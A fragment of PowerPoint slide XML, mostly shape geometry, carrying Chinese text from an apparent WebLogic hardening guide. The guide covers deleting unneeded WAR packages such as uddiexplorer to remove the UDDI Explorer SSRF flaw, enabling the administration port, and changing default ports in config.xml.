                  <a:pt x="9547669" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="16359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5191" y="3962400"/>
            <a:ext cx="9537700" cy="1877695"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9537700" h="1877695">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9537192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9537192" y="1877568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="187756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188" y="3958145"/>
            <a:ext cx="9547860" cy="1887220"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9547860" h="1887220">
                <a:moveTo>
                  <a:pt x="9542907" y="1886965"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1886965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1886737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1886051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1884997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1883676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1882203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77440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1877440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1882203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="1882203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547428" y="1883676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9546755" y="1884997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9545701" y="1886051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9544367" y="1886737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="1886965"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="188722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1887220">
                <a:moveTo>
                  <a:pt x="95381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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1887220">
                <a:moveTo>
                  <a:pt x="9538144" y="1882203"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="1877440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="1877440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1882203"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1887220">
                <a:moveTo>
                  <a:pt x="9547669" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9525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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1887220">
                <a:moveTo>
                  <a:pt x="9525" y="1882203"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1877440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1877440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1882203"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1887220">
                <a:moveTo>
                  <a:pt x="9538144" y="1882203"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1882203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1877440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1877440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1882203"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1887220">
                <a:moveTo>
                  <a:pt x="9547669" y="1882203"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1882203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="1877440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="1877440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="18822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7051" y="1835327"/>
            <a:ext cx="9595485" cy="394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停止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Weblogic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应用，根据需要删除下列位置的对应名称的文件或目录，然后重启服务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492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WAR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包：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="60642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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%WEBLOGIC_HOME%/wlserver/server/lib/*.war</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="606425">
              <a:lnSpc>
                <a:spcPts val="1910"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%WEBLOGIC_HOME%/***domain/servers/***server/tmp/.internal/*.war</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="149225">
              <a:lnSpc>
                <a:spcPts val="2150"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>工作目录：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="606425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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%WEBLOGIC_HOME%/***domain/servers/***server/tmp/_WL_internal/*</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="149225">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="16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注意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**domain </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>是在安装</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5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时由运维人员定义的名称，需根据实际情况确</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>定</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="149225" marR="255904">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1250"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>例如，要删除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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>uddiexplorer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>解决</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="95" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UDDI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Explorer SSRF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漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0"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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CVE-2014-4241</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>需要删除下 列文件</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>目录：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="60642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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%WEBLOGIC_HOME%/wlserver/server/lib/uddiexplorer.war</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6064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%WEBLOGIC_HOME%/***domain/servers/***server/tmp/.internal/uddiexplorer.war</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6064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%WEBLOGIC_HOME%/***domain/servers/***server/tmp/_WL_internal/uddiexplorer(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>目录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4922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注意：所有</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bea</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>wls</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>开头的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>war</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>包都不能删除，删除后</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5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将无法启动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1480743"/>
            <a:ext cx="6718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启用管理端口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使用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访问。例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https://x.x.x.x:9002/console/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5191" y="2308860"/>
            <a:ext cx="9537700" cy="1632585"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9537700" h="1632585">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9537192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9537192" y="1632204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="163220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188" y="2304440"/>
            <a:ext cx="9547860" cy="1640839"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9542907" y="1640751"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1640751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1640509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1639836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1638782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1637449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1635988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95476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631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1635988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="1635988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547428" y="1637449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9546755" y="1638782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9545701" y="1639836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9544367" y="1640509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="1640751"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="16408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47860" h="1640839">
                <a:moveTo>
                  <a:pt x="95381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538144" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9538144" y="1635988"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1635988"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9547669" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9542907" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9525" y="1635988"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1635988"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9538144" y="1635988"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1635988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1635988"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9547860" h="1640839">
                <a:moveTo>
                  <a:pt x="9547669" y="1635988"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9538144" y="1635988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9542907" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="1631226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9547669" y="16359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67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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方法一：通过配置文件来配置（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>配置完成后，需要重启</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr sz="1450">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="606425" marR="167005">
              <a:lnSpc>
                <a:spcPts val="2150"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>修改所创建域下的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config/config.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件，在文件的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configuration-version</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>参数前插入如下 配置（如果已有相关配置请直接修改参数对应的值）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1063625">
              <a:lnSpc>
                <a:spcPts val="187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&lt;!--</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>管理端口开关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//--&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="106362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&lt;administration-port-enabled&gt;true&lt;/administration-port-enabled&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="106362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&lt;!--</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>管理端口号，默认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9002--&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="106362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&lt;administration-port&gt;9002&lt;/administration-port&gt;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680" y="1499184"/>
            <a:ext cx="334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方法二：通过管理控制台配置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880" y="1903679"/>
            <a:ext cx="10427970" cy="51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5"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="297815" algn="l"/>
                <a:tab pos="9190990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登录管理控制台，在左侧边栏的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域结构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中点击</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="85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“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****do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1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ain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（创建的域）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点击标签栏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配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置</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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	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一般信息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勾选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启用管理端口</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="42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”，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单击页面底部的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保存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按钮。完成后，点击左侧边栏顶部的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激活更改</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="84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”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按钮即可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5191" y="2461260"/>
            <a:ext cx="9857232" cy="402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031" y="3811270"/>
            <a:ext cx="1268095" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1268095" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1267968" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126796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19810" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1019810" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1019556" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101955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60108"/>
            <a:ext cx="640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oto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-95" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-45" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>og</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的默认开放端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019555" y="2087879"/>
            <a:ext cx="9904730" cy="2799715"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="2799715">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="2799588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="279958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4768" y="2082355"/>
            <a:ext cx="9914255" cy="2810510"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="2810510">
                <a:moveTo>
                  <a:pt x="9909390" y="2810294"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2810294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2810052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="2809379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="2808325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="2807004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2805531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800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2805531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="2805531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="2807004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913251" y="2808325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912197" y="2809379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910864" y="2810052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="2810294"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="281051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9914255" h="2810510">
                <a:moveTo>
                  <a:pt x="990462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4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="2810510">
                <a:moveTo>
                  <a:pt x="9904628" y="2805531"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="2805531"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="2810510">
                <a:moveTo>
                  <a:pt x="9914153" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9524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4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="2810510">
                <a:moveTo>
                  <a:pt x="9525" y="2805531"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2805531"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="2810510">
                <a:moveTo>
                  <a:pt x="9904628" y="2805531"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2805531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="2805531"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="2810510">
                <a:moveTo>
                  <a:pt x="9914153" y="2805531"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="2805531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="2800769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="28055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97723"/>
            <a:ext cx="10284460" cy="322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88104" algn="ctr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配置文件修改：在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weblogic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的域中找到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config\config.xml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文件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R="8373109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server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>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&lt;name&gt;AdminServer&lt;/name&gt;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&lt;ssl&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="8096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&lt;enabled&gt;false&lt;/enabled&gt;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&lt;/ssl&gt;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listen-port</a:t>
            </a:r>
            <a:r>
